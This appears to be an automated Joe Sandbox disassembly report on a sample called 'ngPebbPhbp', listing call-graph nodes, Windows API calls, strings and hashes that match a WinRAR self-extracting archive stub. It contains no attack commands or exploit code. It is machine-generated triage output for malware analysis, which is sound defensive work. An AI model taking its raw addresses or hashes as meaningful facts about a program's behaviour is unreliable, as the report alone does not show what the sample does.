29201 b25734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29202 b0d327 29201->29202 29202->29124 29205->29207 29439 b07e1b 29205->29439 29207->29201 29208 b0c0c8 29451 b1106b 29208->29451 29212 b0c151 29217 b0c16f 29212->29217 29538 b12095 45 API calls __EH_prolog3_GS 29212->29538 29214 b0c239 29215 b0c269 29214->29215 29218 b0c374 29214->29218 29222 b0c29b 29215->29222 29539 b019a9 26 API calls 29215->29539 29216 b0d205 29219 b0c948 29216->29219 29256 b0c743 29216->29256 29217->29214 29541 b10ddb 28 API calls 29217->29541 29218->29216 29223 b0c3ea 29218->29223 29224 b0c3cf 29218->29224 29234 b0c97a 29219->29234 29574 b019a9 26 API calls 29219->29574 29222->29207 29540 b019a9 26 API calls 29222->29540 29238 b0c409 29223->29238 29543 b0b92d 56 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29223->29543 29227 b01a66 26 API calls 29224->29227 29232 b0c3da 29227->29232 29229 b0d276 29229->29207 29606 b019a9 26 API calls 29229->29606 29233 b01a66 26 API calls 29232->29233 29233->29207 29234->29207 29575 b019a9 26 API calls 29234->29575 29236 b0c33d _wcslen 29542 b0f103 52 API calls 2 library calls 29236->29542 29237 b0c4ea 29461 b0b2ee 29237->29461 29238->29237 29239 b0f711 53 API calls 29238->29239 29249 b0c49b 29239->29249 29243 b0c5c2 29244 b0c7d8 29243->29244 29248 b0c5cf 29243->29248 29552 b12a36 115 API calls 29244->29552 29246 b01a66 26 API calls 29246->29237 29280 b0c62c 29248->29280 29546 b057c0 28 API calls 2 library calls 29248->29546 29249->29246 29251 b0c501 29257 b0c551 29251->29257 29544 b019a9 26 API calls 29251->29544 29254 b0c8f0 29261 b0c9eb 29254->29261 29276 b0c8ff 29254->29276 29255 b0c830 29255->29254 29263 b0c859 29255->29263 29256->29229 29605 b019a9 26 API calls 29256->29605 29257->29207 29545 b019a9 26 API calls 29257->29545 29278 b0c874 29261->29278 29467 b0b345 29261->29467 29262 b0c940 29265 b0ddc7 114 API calls 29262->29265 29268 b0ed0d 49 API calls 29263->29268 29270 b0ca64 29263->29270 29263->29278 
29265->29219 29266 b0ca01 29269 b0ca05 29266->29269 29473 b0b778 29266->29473 29267 b0d1f2 29271 b0ddc7 114 API calls 29267->29271 29272 b0c8b3 29268->29272 29273 b0ddc7 114 API calls 29269->29273 29270->29267 29294 b0cac5 29270->29294 29576 b0e152 29270->29576 29271->29216 29272->29278 29554 b0d8b8 29272->29554 29273->29256 29276->29262 29573 b0b544 144 API calls __EH_prolog3_GS 29276->29573 29278->29269 29278->29270 29283 b0b345 90 API calls 29278->29283 29279 b0cb15 29286 b0fd70 28 API calls 29279->29286 29280->29256 29281 b0c77a 29280->29281 29290 b0c781 29280->29290 29547 b0b015 28 API calls 29280->29547 29548 b12a36 115 API calls 29280->29548 29549 b032d2 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29280->29549 29550 b0b8ed 89 API calls 29280->29550 29551 b032d2 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29281->29551 29288 b0ca5e 29283->29288 29307 b0cb2f 29286->29307 29288->29269 29288->29270 29290->29255 29553 b0ede9 119 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29290->29553 29292 b0cab7 29580 b09653 109 API calls 29292->29580 29503 b0fd70 29294->29503 29295 b0cc21 29296 b0cc76 29295->29296 29297 b0cf27 29295->29297 29298 b0cd33 29296->29298 29300 b0cc94 29296->29300 29301 b0cf50 29297->29301 29302 b0cf39 29297->29302 29325 b0ccb5 29297->29325 29584 b122b9 28 API calls 29298->29584 29304 b0ccd8 29300->29304 29312 b0cca3 29300->29312 29507 b19625 29301->29507 29591 b0d771 29302->29591 29303 b0cd69 29308 b1106b 45 API calls 29303->29308 29304->29325 29583 b0a7a2 142 API calls 29304->29583 29307->29295 29581 b0e39d 8 API calls 29307->29581 29310 b0cd76 29308->29310 29309 b0cf73 29523 b194ea 29309->29523 29585 b0b92d 56 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29310->29585 29582 b032d2 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29312->29582 29318 b0cdaf 29319 b0cddd 29318->29319 29320 b0cdcd 29318->29320 29321 b0cddf 29318->29321 29326 b0ce3e 

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00B16D7B: GetModuleHandleW.KERNEL32(kernel32,5EA84158), ref: 00B16DC7
                                                  • Part of subcall function 00B16D7B: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B16DD9
                                                  • Part of subcall function 00B16D7B: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B16E03
                                                  • Part of subcall function 00B11309: __EH_prolog3.LIBCMT ref: 00B11310
                                                  • Part of subcall function 00B11309: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,00B117FB,?,?,\\?\,5EA84158,?,?,?,00000000,00B3A279,000000FF), ref: 00B11319
                                                  • Part of subcall function 00B1F4D4: OleInitialize.OLE32(00000000), ref: 00B1F4ED
                                                  • Part of subcall function 00B1F4D4: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00B1F524
                                                  • Part of subcall function 00B1F4D4: SHGetMalloc.SHELL32(00B5532C), ref: 00B1F52E
                                                • GetCommandLineW.KERNEL32 ref: 00B24608
                                                • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp,?,00000000), ref: 00B2464F
                                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000009,?,00000000), ref: 00B24661
                                                • UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 00B2466F
                                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,00000000), ref: 00B2467D
                                                  • Part of subcall function 00B1FC38: __EH_prolog3.LIBCMT ref: 00B1FC3F
                                                  • Part of subcall function 00B23EFC: __EH_prolog3_GS.LIBCMT ref: 00B23F03
                                                  • Part of subcall function 00B23EFC: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?,?,?,?,?,?,00000028), ref: 00B23F1B
                                                  • Part of subcall function 00B23EFC: SetEnvironmentVariableW.KERNEL32(sfxpar,?,?,?,?,?,?,?,00000028), ref: 00B23F86
                                                  • Part of subcall function 00B151BF: _wcslen.LIBCMT ref: 00B151E3
                                                • UnmapViewOfFile.KERNEL32(00000000,00B55430,00000400,00B55430,00B55430,00000400,00000000,00000001,?,00000000), ref: 00B246CC
                                                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00B246D3
                                                • SetEnvironmentVariableW.KERNEL32(sfxname,00B49698,00000000), ref: 00B2472F
                                                • GetLocalTime.KERNEL32(?), ref: 00B2473A
                                                • _swprintf.LIBCMT ref: 00B24779
                                                • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00B2478E
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00B24795
                                                • LoadIconW.USER32(00000000,00000064), ref: 00B247AC
                                                • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_00020900,00000000), ref: 00B24803
                                                • Sleep.KERNELBASE(00001B58), ref: 00B24834
                                                • DeleteObject.GDI32 ref: 00B24858
                                                • DeleteObject.GDI32(00050E80), ref: 00B24868
                                                  • Part of subcall function 00B014A7: _wcslen.LIBCMT ref: 00B014B8
                                                  • Part of subcall function 00B219EE: __EH_prolog3_GS.LIBCMT ref: 00B219F5
                                                • CloseHandle.KERNEL32 ref: 00B248AA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: File$EnvironmentHandleVariableView$AddressCloseDeleteH_prolog3H_prolog3_ModuleObjectProcUnmap_wcslen$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingOpenParamSleepStartupTime_swprintf
                                                • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                • API String ID: 3142445277-3710569615
                                                • Opcode ID: ea97386e7ae6edefa3d98c3fd0151ea9ee44ef0f928b202cafca412b5b487452
                                                • Instruction ID: ba6caa49a257bd323007a4f0e3f423103ff7b78970ffdb3043593231a03a6104
                                                • Opcode Fuzzy Hash: ea97386e7ae6edefa3d98c3fd0151ea9ee44ef0f928b202cafca412b5b487452
                                                • Instruction Fuzzy Hash: BD91CE71504754EFD320AB64EC55BAF7BE8EB49702F800899F949A3292EF74A944CB21

                                                Control-flow Graph

                                                APIs
                                                • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00B20845,00000066), ref: 00B1EBE6
                                                • SizeofResource.KERNEL32(00000000,?,?,?,00B20845,00000066), ref: 00B1EBFD
                                                • LoadResource.KERNEL32(00000000,?,?,?,00B20845,00000066), ref: 00B1EC14
                                                • LockResource.KERNEL32(00000000,?,?,?,00B20845,00000066), ref: 00B1EC23
                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,00B20845,00000066), ref: 00B1EC3E
                                                • GlobalLock.KERNEL32(00000000), ref: 00B1EC4F
                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00B1EC73
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00B1ECD7
                                                  • Part of subcall function 00B1EB06: GdipAlloc.GDIPLUS(00000010), ref: 00B1EB0C
                                                • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00B1ECB8
                                                • GlobalFree.KERNEL32(00000000), ref: 00B1ECDE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                • String ID: PNG
                                                • API String ID: 211097158-364855578
                                                • Opcode ID: 1025e6c8db1ccf221053d140fec006ea7835e96111c83b525d8813f88e72036a
                                                • Instruction ID: da28e6a33abcb3aad77e3792156b2017ae5aecf6dbfc527b01db455dbca876bf
                                                • Opcode Fuzzy Hash: 1025e6c8db1ccf221053d140fec006ea7835e96111c83b525d8813f88e72036a
                                                • Instruction Fuzzy Hash: 0D316775600702ABD7209FA1ED48E6BBFACFB85750B200569FD25E3261EF31D850DBA0
                                                APIs
                                                  • Part of subcall function 00B18781: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,5EA84158,00000007,?,?,?,00B18751,?,?,?,?,0000000C,00B04426), ref: 00B1879D
                                                • _wcslen.LIBCMT ref: 00B1395A
                                                • __fprintf_l.LIBCMT ref: 00B13AA7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide__fprintf_l_wcslen
                                                • String ID: ,$$%s:$*messages***$*messages***$@%s:$RTL
                                                • API String ID: 1796436225-285229759
                                                • Opcode ID: 86be9b54683fbdbb4236cd5cd024e80f7bd6a360567ed491ce47d0ed9ac5e1ac
                                                • Instruction ID: 38cdc4af5a9852b26bec94fdba6e1408e0d4456a0cdc47f3dda62622064cbaca
                                                • Opcode Fuzzy Hash: 86be9b54683fbdbb4236cd5cd024e80f7bd6a360567ed491ce47d0ed9ac5e1ac
                                                • Instruction Fuzzy Hash: BA52C671900259EBDF24DFA8DC85AEEB7F4FF04710F9005AAE415E7291E7719A84CB90

                                                Control-flow Graph

                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B0F830
                                                • FindFirstFileW.KERNELBASE(?,?,00000274,00B0F733,000000FF,00000049,00000049,?,?,00B0A684,?,?,00000000,?,?,?), ref: 00B0F859
                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,00B0D303,?,?,?,?,?,?,?,5EA84158,00000049), ref: 00B0F8A4
                                                • GetLastError.KERNEL32(?,?,?,00B0D303,?,?,?,?,?,?,?,5EA84158,00000049,?,00000000), ref: 00B0F902
                                                • FindNextFileW.KERNEL32(?,?,00000274,00B0F733,000000FF,00000049,00000049,?,?,00B0A684,?,?,00000000,?,?,?), ref: 00B0F92D
                                                • GetLastError.KERNEL32(?,00B0D303,?,?,?,?,?,?,?,5EA84158,00000049,?,00000000), ref: 00B0F93A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: FileFind$ErrorFirstLast$H_prolog3_Next
                                                • String ID:
                                                • API String ID: 3831798110-0
                                                • Opcode ID: 7d9e6b6427e6ce1655877afb2847385ddbff6ce88936266695271b916b7c687b
                                                • Instruction ID: 0a7ab4bd06cbd93d0964c7a85e4949efe43784001aa35afd5f0073d7efd7395e
                                                • Opcode Fuzzy Hash: 7d9e6b6427e6ce1655877afb2847385ddbff6ce88936266695271b916b7c687b
                                                • Instruction Fuzzy Hash: F3511F71905619DBCF24DF64C889AEDBBF4FB09320F6042E9E419A3690DB30AA84CF50
                                                APIs
                                                • _wcslen.LIBCMT ref: 00B0C342
                                                  • Part of subcall function 00B12095: __EH_prolog3_GS.LIBCMT ref: 00B1209C
                                                  • Part of subcall function 00B057C0: __EH_prolog3.LIBCMT ref: 00B057C7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3H_prolog3__wcslen
                                                • String ID: __tmp_reference_source_
                                                • API String ID: 1523997010-685763994
                                                • Opcode ID: 5185972b4f5b20fb660e9fc3573799168bb93d5a4d08405dae98d62b81d4b04b
                                                • Instruction ID: e714f4fea19cd45f780c62d0a9c1804861b1877ad0b659e2e41bee54979754e5
                                                • Opcode Fuzzy Hash: 5185972b4f5b20fb660e9fc3573799168bb93d5a4d08405dae98d62b81d4b04b
                                                • Instruction Fuzzy Hash: B3D2B3719042899FDB25DFA4C891BEEBFF4FF05304F0446AAE49A972C1DB34A949CB50
                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000000,?,00B2EC80,00000000,00B46F40,0000000C,00B2EDD7,00000000,00000002,00000000), ref: 00B2ECCB
                                                • TerminateProcess.KERNEL32(00000000,?,00B2EC80,00000000,00B46F40,0000000C,00B2EDD7,00000000,00000002,00000000), ref: 00B2ECD2
                                                • ExitProcess.KERNEL32 ref: 00B2ECE4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Process$CurrentExitTerminate
                                                • String ID:
                                                • API String ID: 1703294689-0
                                                • Opcode ID: d8e90b440b35e3648850a083c5f969f03f6001d60025e796dd66c433555dedba
                                                • Instruction ID: 8e6812185c7771edc439c48ee21dbce91fec196a59439356d6ea97a3a3c71f24
                                                • Opcode Fuzzy Hash: d8e90b440b35e3648850a083c5f969f03f6001d60025e796dd66c433555dedba
                                                • Instruction Fuzzy Hash: 2FE0B636000658AFCF116F96EE09A5C7FA9EF51781F1414A4F959AB122CB36ED42DB40
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3
                                                • String ID:
                                                • API String ID: 431132790-0
                                                • Opcode ID: 74530c972737399332223124a51e05b53dd12470047abe4c9997ee6b5fdadc5b
                                                • Instruction ID: 4a999be7db822583c17acb2f5951d56037d1e872fd4430568936670eb0c4b0c9
                                                • Opcode Fuzzy Hash: 74530c972737399332223124a51e05b53dd12470047abe4c9997ee6b5fdadc5b
                                                • Instruction Fuzzy Hash: 28E1A2716083458FDB24DF28C984B9BBBE1FF88304F4445ADE8899B346D734E985CB92
                                                APIs
                                                • __EH_prolog3_catch_GS.LIBCMT ref: 00B2090A
                                                  • Part of subcall function 00B01E44: GetDlgItem.USER32(00000000,00003021), ref: 00B01E88
                                                  • Part of subcall function 00B01E44: SetWindowTextW.USER32(00000000,00B3C6C8), ref: 00B01E9E
                                                • EndDialog.USER32(?,00000000), ref: 00B20A18
                                                • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B20A57
                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B20A71
                                                • IsDialogMessageW.USER32(?,?), ref: 00B20A84
                                                • TranslateMessage.USER32(?), ref: 00B20A92
                                                • DispatchMessageW.USER32(?), ref: 00B20A9C
                                                • EndDialog.USER32(?,00000001), ref: 00B20ADE
                                                • GetDlgItem.USER32(?,00000068), ref: 00B20B04
                                                • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B20B1F
                                                • SendMessageW.USER32(00000000,000000C2,00000000,00B3C6C8), ref: 00B20B32
                                                • SetFocus.USER32(00000000), ref: 00B20B39
                                                • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00B20C20
                                                • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00B20C4C
                                                • GetTickCount.KERNEL32 ref: 00B20C79
                                                • GetLastError.KERNEL32(?,00000011), ref: 00B20CD5
                                                • GetCommandLineW.KERNEL32 ref: 00B20DF9
                                                • _wcslen.LIBCMT ref: 00B20E06
                                                • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,?,winrarsfxmappingfile.tmp,?,00B55430,00000400,00000001,00000001), ref: 00B20E85
                                                • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 00B20EA3
                                                • ShellExecuteExW.SHELL32(0000003C), ref: 00B20EDC
                                                • WaitForInputIdle.USER32(?,00002710), ref: 00B20F0B
                                                • Sleep.KERNEL32(00000064), ref: 00B20F25
                                                • UnmapViewOfFile.KERNEL32(?,?,?,?,?,?,?,00B55430,00000400), ref: 00B20F61
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00B55430,00000400), ref: 00B20F6D
                                                • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B21072
                                                  • Part of subcall function 00B01E1F: GetDlgItem.USER32(?,?), ref: 00B01E34
                                                  • Part of subcall function 00B01E1F: ShowWindow.USER32(00000000), ref: 00B01E3B
                                                • SetDlgItemTextW.USER32(?,00000065,00B3C6C8), ref: 00B2108A
                                                • GetDlgItem.USER32(?,00000065), ref: 00B21093
                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00B210A2
                                                • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_000206D0,00000000,?), ref: 00B21422
                                                • EndDialog.USER32(?,00000001), ref: 00B21436
                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B210B1
                                                  • Part of subcall function 00B1E265: __EH_prolog3_GS.LIBCMT ref: 00B1E26C
                                                  • Part of subcall function 00B1E265: ShowWindow.USER32(?,00000000,00000038), ref: 00B1E294
                                                  • Part of subcall function 00B1E265: GetWindowRect.USER32(?,?), ref: 00B1E2D8
                                                  • Part of subcall function 00B1E265: ShowWindow.USER32(?,00000005,?,00000000), ref: 00B1E373
                                                • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B2114F
                                                • SendMessageW.USER32(?,00000080,00000001,00070459), ref: 00B21284
                                                • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,00050E80), ref: 00B2129D
                                                • GetDlgItem.USER32(?,00000068), ref: 00B212A6
                                                • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00B212BE
                                                • GetDlgItem.USER32(?,00000066), ref: 00B212E6
                                                • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00B2135D
                                                • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B21371
                                                • EnableWindow.USER32(?,00000000), ref: 00B215A7
                                                • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00B215E8
                                                • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B2160D
                                                  • Part of subcall function 00B21D4F: __EH_prolog3_GS.LIBCMT ref: 00B21D59
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Item$Message$TextWindow$Send$Dialog$ErrorFileLastShow$H_prolog3_LongView$CloseCommandCountCreateDispatchEnableExecuteFocusH_prolog3_catch_HandleIdleInputLineMappingParamRectShellSleepTickTranslateUnmapWait_wcslen
                                                • String ID: -el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_$winrarsfxmappingfile.tmp
                                                • API String ID: 3616063595-3000381960
                                                • Opcode ID: 8979191c656d2815237007749faf82bb97f260ce3440df89e546f23695c72be0
                                                • Instruction ID: 685a7b5044d7f2b2b13d3e2cc6825fe9e93e3cccedae4173219deffa5282160a
                                                • Opcode Fuzzy Hash: 8979191c656d2815237007749faf82bb97f260ce3440df89e546f23695c72be0
                                                • Instruction Fuzzy Hash: B972C470950358EEEB24EBA4EC49BEE7BF9AB11702F0044D5F509B71D2DBB45A84CB21

                                                Control-flow Graph

                                                APIs
                                                • GetModuleHandleW.KERNEL32(kernel32,5EA84158), ref: 00B16DC7
                                                • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B16DD9
                                                • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B16E03
                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B170CA
                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B170DF
                                                • ReadFile.KERNEL32(00000000,?,00007FFE,?,00000000), ref: 00B170FF
                                                • CloseHandle.KERNEL32(00000000), ref: 00B17187
                                                • CompareStringW.KERNEL32(00000400,00001001,?,000000FF,DXGIDebug.dll,000000FF,?,?,?), ref: 00B171F8
                                                • AllocConsole.KERNEL32 ref: 00B1735E
                                                • GetCurrentProcessId.KERNEL32 ref: 00B17368
                                                • AttachConsole.KERNEL32(00000000), ref: 00B1736F
                                                • GetStdHandle.KERNEL32(000000F4,00000000,00000000,?,00000000), ref: 00B1738F
                                                • WriteConsoleW.KERNEL32(00000000), ref: 00B17396
                                                • Sleep.KERNEL32(00002710), ref: 00B173A1
                                                • FreeConsole.KERNEL32 ref: 00B173A7
                                                • ExitProcess.KERNEL32 ref: 00B173B7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentExitFreeModulePointerReadSleepStringWrite
                                                • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                • API String ID: 2644799563-3298887752
                                                • Opcode ID: 2eea7bf3036519e155a6af5c6b0fd12b67003544dc8d6c3b38043fb9bec01a73
                                                • Instruction ID: 69ca7304b3019a77c6eb2c83bdef8ee37c79b4fad38810ebb621dfab2561cf43
                                                • Opcode Fuzzy Hash: 2eea7bf3036519e155a6af5c6b0fd12b67003544dc8d6c3b38043fb9bec01a73
                                                • Instruction Fuzzy Hash: FEF1807240428CEBCB24DFA4DC49BDE3BE9FF05304F604599F919AB291DB709A49CB91

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00B20678: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B20689
                                                  • Part of subcall function 00B20678: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B2069A
                                                  • Part of subcall function 00B20678: IsDialogMessageW.USER32(00010460,?), ref: 00B206AE
